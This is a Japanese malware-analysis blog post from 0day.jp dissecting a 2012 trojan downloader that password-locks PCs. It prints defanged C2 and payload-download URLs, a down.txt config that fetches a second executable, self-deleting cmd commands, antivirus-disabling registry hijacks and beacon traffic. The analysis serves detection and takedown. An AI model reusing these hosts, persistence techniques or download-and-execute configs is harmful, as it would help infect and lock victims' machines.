サーバー:126.15.181.20/ NetBox Version 2.8 Build 4128 ポート:8080 URL: hxxp://126.15.181.20/8080/stup.exe
本件はトロイですので、感染されたら他のマルウェアをダウンロードされます。
そして、パソコンをBOOTKITのフック方法でパスワード・ロックされます。
危険ですので早めに削除して下さい。
現在もダウンロードが出来ている証拠↓
Tue Nov 6 14:37:00 JST 2012
--14:46:11-- hxxp://126.15.181.20/8080/stup.exe
=> `stup.exe'
HTTP/1.1 200 OK
Server: NetBox Version 2.8 Build 4128
Date: Tue, 06 Nov 2012 06:26:11 GMT
Connection: Close
Content-Type: application/x-msdownload
Last-Modified: Sun, 30 Sep 2012 12:47:12 GMT
Content-Length: 56757
Connecting to 126.15.181.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 56,757 (55K) [application/x-msdownload]
100%[===================================> ] 56,757 242.76K/s
14:46:12 (242.61 KB/s) - `stup.exe' saved [56757/56757]
MD5: 57415a5a61c5b38ed9a1cd8c15a7a4b0■ バイナリー調査↓
//見た目↓
//ファストブロック
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ.............. 0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 B0 00 00 00 ................ 0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th 0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno 0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$....... 0080 5D 65 FD C8 19 04 93 9B 19 04 93 9B 19 04 93 9B ]e.............. 0090 97 1B 80 9B 11 04 93 9B E5 24 81 9B 18 04 93 9B .........$...... 00A0 52 69 63 68 19 04 93 9B 00 00 00 00 00 00 00 00 Rich............ 00B0 50 45 00 00 4C 01 02 00 BE 82 0E 50 00 00 00 00 PE..L......P.... 00C0 00 00 00 00 E0 00 0F 01 0B 01 05 0C 00 00 00 00 ................
//Packer:
Ding Boy's PE-lock Phantasm v1.0 /v1.1 0x00004D 0x40004D !This program cannot be run in DOS mode. 0x0001A8 0x4001A8 DINGBOY 0x0001D0 0x4001D0 DINGBOY
//ニセマルウェア/ウイルスアラート↓
0x009BCC 0x4279CC Error: 0x009BD3 0x4279D3 File damaged or infected by virus! 0x009BF6 0x4279F6 Could not load %s dynamic link library! 0x009C1E 0x427A1E Could not find %s export inside %s dynamic link library! 0x009C57 0x427A57 Could not find ordinal export:%08X inside %s dynamic link library!
//詐欺/ロック・パスワードエラー↓
0x009CBA 0x427ABA Info: 0x009CC0 0x427AC0 Warning: Password you have entered is not vaild! 0x009CF1 0x427AF1 Do you want to cancel the file download? 0x009D1B 0x427B1B Warning: Application can not run without nessesary .dll files! 0x009D5A 0x427B5A Could not download nessesary .dll file(s) because: 0x009D90 0x427B90 1) You are not connected to internet 0x009DB6 0x427BB6 2) File can not be found on remote server 0x009DE1 0x427BE1 3) Your firewall has blocked access to internet 0x009E14 0x427C14 Since application can not run without nessesary .dll files, program will now close! 0x009E68 0x427C68 Downloaded .dll file is corrupt and can not be loaded! 0x009EA0 0x427CA0 Please restart this aplication so the file can be downloaded again!
//インターネットからダウンロード↓
0x00A0DA 0x427EDA urlmon.dll 0x00A13D 0x427F3D WebSite: %s 0x00A149 0x427F49 Downloading: %s 0x00A159 0x427F59 Completed: %d percent 0x00A16F 0x427F6F File: %d/%d 0x00D5BD 0x40D5BD urlmon.dll 0x00D5C9 0x40D5C9 URLDownloadToFileA 0x00D5DD 0x40D5DD biaoji 0x00D5E5 0x40D5E5 localfile 0x00D5F1 0x40D5F1 count
//レジストリーのセキュリティーをバイパス↓
0x00D5FD 0x40D5FD DisableRegistryTools 0x00D615 0x40D615 Software\Microsoft\Windows\CurrentVersion\Policies\System 0x00D659 0x40D659 Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
■ 行動分析調査/マルウェア動き調査↓
証拠↓
保存されたマルウェアファイル↓
\\.\PHYSICALDRIVE0 C:\DOCUME~1\~1\LOCALS~1\Temp\DogKiller.sys C:\WINDOWS\system32\down.txt C:\DOCUME~1\ ~1\LOCALS~1\Temp\sv2.tmp C:\WINDOWS\system32\sa.exe \\.\PIPE\lsarpc C:\WINDOWS\IRIMGV3.bmp
移動されたマルウェアファイル↓
C:\86d2682cd6e5e636d6e9ecab0543cb8e2b4960879ea8444b3017da7a29cb5922 ⇒ null(削除) //←マルウェアファイル C:\86d2682cd6e5e636d6e9ecab0543cb8e2b4960879ea8444b3017da7a29cb5922 ⇒ C:\WINDOWS\system32\scvhostv.exe C:\WINDOWS\system32\ws2help.dll ⇒ C:\WINDOWS\system32\ws2help.dll.XOM.tmp C:\WINDOWS\IRIMGV3.bmp ⇒ C:\WINDOWS\system32\ws2help.dll C:\WINDOWS\system32\ws2help.dll ⇒ C:\WINDOWS\system32\ws2helpXP.dll
削除されたマルウェアファイル↓
C:\DOCUME~1\~1\LOCALS~1\Temp\DogKiller.sys //マルウェアドライバー C:\WINDOWS\system32\dia3.ini //マルウェア設定ファイル *)さらに直ぐに削除されます↑そして本関係ファイル@レジストリーも↓ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DogKiller\Enum HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DogKiller\Security HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DogKiller
マルウェアコマンド実行一覧↓
C:\DOCUME~1\~1\LOCALS~1\Temp\sv2.tmp C:\WINDOWS\system32\sa.exe cmd /cfor /l %a in (0,0,0) do if exist C:\DOCUME~1\ ~1\LOCALS~1\Temp\sv2.exe" (del/a/f "C:\DOCUME~1\ ~1\LOCALS~1\Temp\sv2.exe") else exit" C:\WINDOWS\system32\cmd.exe /c del C:\WINDOWS\system32\sa.exe""
実行されたマルウェアサービス情報↓
MACHINE: localhost DATABASE: SERVICES_ACTIVE_DATABASE DogKiller RASMAN (successful)
【重要!】フック↓
TYPE: WH_MSGFILTER METHOD: SetWindowsHook
マルウェアが変更されたレジストリー↓
キー HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AYAgent.aye\Debugger 種類 REG_SZ VALUE: svchost.exe キー HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AYServiceNt.aye\Debugger 種類 REG_SZ VALUE: svchost.exe キー HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ALYac.aye\Debugger 種類 REG_SZ VALUE: svchost.exe キー HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AYUpdate.aye\Debugger 種類 REG_SZ VALUE: svchost.exe キー HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sgsvc.exe\Debugger 種類 REG_SZ VALUE: svchost.exe キー HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3LTray.exe\Debugger 種類 REG_SZ VALUE: svchost.exe キー HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3LSvc.exe\Debugger 種類 REG_SZ VALUE: svchost.exe
//ニセビデオAPP登録…
キー HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\CommonVideo 種類 REG_SZ VALUE: C:\Documents and Settings\All Users\Documents\My Videos
//インターネット設定を変更…
キー HKEY_USERS\S-1-5-21-1275210071-920026266-1060284298-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\MigrateProxy 種類 REG_DWORD VALUE: 1 キー HKEY_USERS\S-1-5-21-1275210071-920026266-1060284298-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable 種類 REG_DWORD VALUE: 0 キー HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable 種類 REG_DWORD VALUE: 0 キー HKEY_USERS\S-1-5-21-1275210071-920026266-1060284298-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings 種類 REG_BINARY VALUE: キー HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProxyBypass 種類 REG_DWORD VALUE: 1 キー HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\IntranetName 種類 REG_DWORD VALUE: 1 キー HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\UNCAsIntranet 種類 REG_DWORD VALUE: 1 キー HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\\AppInit_DLLs 種類 REG_SZ VALUE: ws2help.dll
■ マルウェアのネットワーク行動調査↓
感染されたPCからリモートIP(126.15.181.20)にネットワークHANDSHAKE繋ぐ動きを確認しました
(感染されたPC)⇒126.15.181.20 TCP ams > http [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E. 0010 00 30 23 06 40 00 80 06 dc a1 c0 a8 07 54 7e 0f .0#.@... .....T~. 0020 b5 14 04 0d 00 50 5c 42 6e 46 00 00 00 00 70 02 .....P\B nF....p. 0030 40 00 79 19 00 00 02 04 05 b4 01 01 04 02 @.y..... ......
126.15.181.20から⇒(感染されたPC)へ TCP http > ams [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1412 SACK_PERM=1
0000 00 12 f0 e9 3e 3e 00 a0 c9 22 b0 ee 08 00 45 00 ....>>.. ."....E. 0010 00 30 3d d3 00 00 36 06 4b d5 7e 0f b5 14 c0 a8 .0=...6. K.~..... 0020 07 54 00 50 04 0d e9 4c 7e 55 5c 42 6e 47 70 12 .T.P...L ~U\BnGp. 0030 ff ff 51 96 00 00 02 04 05 84 01 01 04 02 ..Q..... ......
(感染されたPC)から⇒126.15.181.20 TCP ams > http [ACK] Seq=1 Ack=1 Win=16944 Len=0
0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E. 0010 00 28 23 07 40 00 80 06 dc a8 c0 a8 07 54 7e 0f .(#.@... .....T~. 0020 b5 14 04 0d 00 50 5c 42 6e 47 e9 4c 7e 56 50 10 .....P\B nG.L~VP. 0030 42 30 3b fa 00 00 B0;...
(感染されたPC)から⇒126.15.181.20へHTTP GET /clcount/count.asp?mac=0012f0e93e3e&ver=2011112601 HTTP/1.1コマンドを送信しました
0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E. 0010 00 b0 23 08 40 00 80 06 dc 1f c0 a8 07 54 7e 0f ..#.@... .....T~. 0020 b5 14 04 0d 00 50 5c 42 6e 47 e9 4c 7e 56 50 18 .....P\B nG.L~VP. 0030 42 30 9c a4 00 00 47 45 54 20 2f 63 6c 63 6f 75 B0....GE T /clcou 0040 6e 74 2f 63 6f 75 6e 74 2e 61 73 70 3f 6d 61 63 nt/count .asp?mac 0050 3d 30 30 31 32 66 30 65 39 33 65 33 65 26 76 65 =0012f0e 93e3e&ve 0060 72 3d 32 30 31 31 31 31 32 36 30 31 20 48 54 54 r=201111 2601 HTT 0070 50 2f 31 2e 31 0d 0a 55 73 65 72 2d 41 67 65 6e P/1.1..U ser-Agen 0080 74 3a 20 47 4f 4f 47 4c 45 0d 0a 48 6f 73 74 3a t: GOOGL E..Host: 0090 20 69 6e 66 6f 6a 73 65 77 66 67 35 2e 69 6e 66 infojse wfg5.inf 00a0 6f 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c o..Cache -Control 00b0 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 0d 0a : no-cac he....
その流れのコミュニケーションは下記となります↓
【送信】GET /clcount/count.asp?mac=0012f0e93e3e&ver=2011112601 HTTP/1.1 User-Agent: GOOGLE Host: infojsewfg5.info Cache-Control: no-cache 【回答】HTTP/1.1 404 File Not Found Server: NetBox Version 2.8 Build 4128 Date: Tue, 06 Nov 2012 06:53:56 GMT Connection: Keep-Alive Content-Length: 212 Content-Type: text/html
そして…本格的なマルウェアのダウンロード…
<html><head><title>404 File Not Found</title></head> <body><h> 404 File Not Found</h1> <hr> <small>Host by <a href="hxxp://www.netbox.cn" target="_blank">NetBox Version 2.8 Build 4128</a></small> </body></html> 【送信】GET /down.txt HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Host: infojsewfg5.info Connection: Keep-Alive 【回答】HTTP/1.1 200 OK Server: NetBox Version 2.8 Build 4128 Date: Tue, 06 Nov 2012 06:53:56 GMT Connection: Keep-Alive Content-Type: text/plain Last-Modified: Sun, 04 Nov 2012 01:57:41 GMT Content-Length: 213 [update] ver=2011112601 url=hxxp://126.15.181.20/8080/stup.exe updatetimer=2 [file]. isfile=1 url2=hxxp://216.18.211.170:6231/1.exe biaoji2=test2 xiazaiyanshi2=16 count=2 isweb=0 web=http://127.0.0.1/
ネットワーク調査の証拠↓
↑上記の動きを見たら下記のサマリーとなります↓
1. 本マルウェアは126.15.181.20にHTTPでバックドアコミュニケーションを行われます。
2. MACADRESSと日付けを送信し126.15.181.20の別のホスト名infojsewfg5.infoに投げます。
3. infojsewfg5.infoからのDOWN.TXTをダウンロードされます、下記のように↓
ダウンロードされたファイルの中身はやはりCNCにあるマルウェア情報↓
4. down.txtの中に中国マルウェアのURLが書いてありますので、本マルウェアはそのURLを実行し
ダウンロードされます、下記のように↓
見た目↓
↑ダウンロードされたマルウェアを実行されたら下記のコマンドを走ってしまい↓
下記の保存されたマルウェアファイルを↓
Windowsシステムドライバーとして実行してしまいます↓
5. それで次パソコンを起動した時にロックが行われております。
結構酷い仕組みですね。。(>_<);;
2. MACADRESSと日付けを送信し126.15.181.20の別のホスト名infojsewfg5.infoに投げます。
3. infojsewfg5.infoからのDOWN.TXTをダウンロードされます、下記のように↓
--16:25:09-- hxxp://infojsewfg5.info/down.txt
=> `down.txt'
Resolving infojsewfg5.info... 126.15.181.20
Connecting to infojsewfg5.info|126.15.181.20|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 213 [text/plain]
16:25:09 (1.29 KB/s) - `down.txt' saved [213/213]ダウンロードされたファイルの中身はやはりCNCにあるマルウェア情報↓
$ cat down.txt [update] ver=2011112601 url=hxxp://126.15.181.20/8080/stup.exe updatetimer=2 [file] isfile=1 url2=hxxp://216.18.211.170:6231/1.exe biaoji2=test2 xiazaiyanshi2=16 count=2 isweb=0 web=hxxp://127.0.0.1/
4. down.txtの中に中国マルウェアのURLが書いてありますので、本マルウェアはそのURLを実行し
ダウンロードされます、下記のように↓
--17:55:36-- hxxp://216.18.211.170:6231/1.exe
=> `1.exe'
Connecting to 216.18.211.170:6231... connected.
HTTP request sent, awaiting response... 200 OK
Length: 147,456 (144K) [application/octet-stream]
17:55:37 (139.94 KB/s) - `1.exe' saved [147456/147456]見た目↓
↑ダウンロードされたマルウェアを実行されたら下記のコマンドを走ってしまい↓
C:\WINDOWS\system32\sa.exe cmd /cfor /l %a in (0,0,0) do if exist C:\\1cb2e1d2ca114f92892be6d4199f5f9adf7dec92bf216a6a3985bf1f2dd99351.exe" (del/a/f "C:\\1cb2e1d2ca114f92892be6d4199f5f9adf7dec92bf216a6a3985bf1f2dd99351.exe") else exit" C:\WINDOWS\system32\cmd.exe /c del C:\WINDOWS\system32\sa.exe""
下記の保存されたマルウェアファイルを↓
C:\WINDOWS\system32\sa.exe C:\WINDOWS\IRIMGV3.bmp
Windowsシステムドライバーとして実行してしまいます↓
C:\WINDOWS\system32\ws2help.dll C:\WINDOWS\system32\ws2helpXP.dll
5. それで次パソコンを起動した時にロックが行われております。
結構酷い仕組みですね。。(>_<);;
マルウェア名前/ウイルストータル調査↓
SHA1: 4471b19ea89b6f176f36765b230cd7995bd123a5 MD5: 57415a5a61c5b38ed9a1cd8c15a7a4b0 File size: 55.4 KB ( 56757 bytes ) File name: stup.exe.bin File Type: Win32 EXE Tags: dingboy peexe rlpack Detection: 33 / 44 Date: 2012-11-06 02:18:52 UTC URL: [CLICK]
マルウェア名前↓
MicroWorld-eScan : Gen:Trojan.Heur.PT.diYabOQLjDe CAT-QuickHeal : Trojan.Popureb McAfee : Artemis!57415A5A61C5 K7AntiVirus : Unwanted-Program F-Prot : W32/RLPacked.A.gen!Eldorado Symantec : Trojan.ADH Norman : W32/Troj_Generic.ETJCA ByteHero : Virus.Win32.Heur.c TrendMicro-HouseCall : TROJ_GEN.RCBCDJ5 Avast : Win32:Malware-gen Kaspersky : HEUR:Trojan.Win32.Generic BitDefender : Gen:Trojan.Heur.PT.diYabOQLjDe Agnitum : Packed/RLPack Emsisoft : Trojan.Win32.AMN (A) Comodo : Heur.Suspicious F-Secure : Gen:Trojan.Heur.PT.diYabOQLjDe DrWeb : Trojan.AVKill.21063 VIPRE : Trojan.Win32.Generic!BT AntiVir : TR/Crypt.XPACK.Gen TrendMicro : TROJ_GEN.RCBCDJ5 McAfee-GW-Edition : Heuristic.LooksLike.Win32.Suspicious.F Sophos : Sus/ComPack-F ESET-NOD32 : probably a variant of Win32/Rootkit.Agent.NFF Kingsoft : Win32.Troj.Undef.(kcloud) Microsoft : Trojan:Win32/Popureb.C GData : Gen:Trojan.Heur.PT.diYabOQLjDe AhnLab-V3 : Downloader/Win32.Small VBA32 : BScope.Trojan.SvcHorse.01643 PCTools : Trojan.ADH Rising : Trojan.Isnev!2D88 Ikarus : Backdoor.Rbot AVG : Win32/Patched.DJ Panda : Trj/CI.A
さらにダウンロードされたマルウェアは↓
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ.............. 0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 B8 00 00 00 ................ 0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th 0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno 0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$....... 0080 8F 8A F9 DB CB EB 97 88 CB EB 97 88 CB EB 97 88 ................ 0090 48 F7 99 88 CA EB 97 88 A2 F4 9E 88 CA EB 97 88 H............... 00A0 22 F4 9A 88 CA EB 97 88 52 69 63 68 CB EB 97 88 ".......Rich.... 00B0 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 ........PE..L...
ヘッターを見たら↓
Microsoft Visual Basic v5.0 - v6.0 Entry Point at 0x12a0 Virtual Address is 0x4012a0 Sections: .text 0x1000 0x19a4 8192 .data 0x3000 0x9ec 4096 .rsrc 0x4000 0x1fd0c 131072
ウイルストータル↓
MD5: 9425b2fbc702bddf7dbaec25e867f99e File size: 144.0 KB ( 147456 bytes ) File name: 1.exe File type: Win32 EXE Tags: peexe Detection: 31 / 44 Date: 2012-11-06 06:02:04 UTC URL: [CLICK]
マルウェア名前↓
MicroWorld-eScan : Gen:Trojan.Heur.VB.jm0@cmZY8Yhb McAfee : Artemis!9425B2FBC702 K7AntiVirus : Riskware F-Prot : W32/OnlineGames.HV.gen!Eldorado TotalDefense : Win32/HostBlock.GD TrendMicro-HouseCall : Mal_OLGM-6 Avast : Win32:OnLineGames-GHA [Trj] Kaspersky : Trojan-Dropper.Win32.VB.mrb BitDefender : Gen:Trojan.Heur.VB.jm0@cmZY8Yhb Agnitum : Rootkit.Agent!WUecpT8Vh0E Emsisoft : Trojan.Dropper.Win32.VB.AMN (A) Comodo : TrojWare.Win32.Trojan.Agent.Gen F-Secure : Gen:Trojan.Heur.VB.jm0@cmZY8Yhb DrWeb : Trojan.MulDrop4.7078 VIPRE : Trojan.Win32.Generic!BT AntiVir : TR/Spy.Gen2 TrendMicro : Mal_OLGM-6 McAfee-GW-Edition : Heuristic.BehavesLike.Win32.Suspicious-BAY.K Sophos : Mal/Behav-363 ESET-NOD32 : a variant of Win32/PSW.OnLineGames.QDQ Kingsoft : Win32.Troj.VB.(kcloud) Microsoft : PWS:Win32/OnLineGames.LH ViRobot : Dropper.Agent.147456.G GData : Gen:Trojan.Heur.VB.jm0@cmZY8Yhb Commtouch : W32/OnlineGames.HV.gen!Eldorado AhnLab-V3 : ASD.Prevention Rising : Trojan.PSW.OnLineGames!452E Ikarus : Trojan-PWS.OnlineGames Fortinet : W32/VB.MRB!tr AVG : Hider.RLD Panda : Trj/CI.A
■ 感染調査|感染されたサーバのネットワーク情報↓
//逆引きIP検索↓
softbank126015181020.bbtec.net
//ネットワーク情報↓
inetnum: 126.0.0.0 - 126.255.255.255 netname: BBTEC descr: Japan Nation-wide Network of Softbank BB Corp. country: JP admin-c: SA421-AP tech-c: SA421-AP role: SoftbankBB ABUSE address: Tokyo Shiodome bldg., 1-9-1, Higashi-Shimbashi, Minatoku,Tokyo country: JP phone: +81-3-6688-5120 e-mail: stsuruma@bb.softbank.co.jp remarks: Please send spam report,virus alart remarks: or any other abuse report remarks: to abuse@bbtec.net
----
ゼロデイ・ジャパン
http://0day.jp
マルウェア研究所
アドリアン・ヘンドリック|Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック
Tweet
0 件のコメント:
コメントを投稿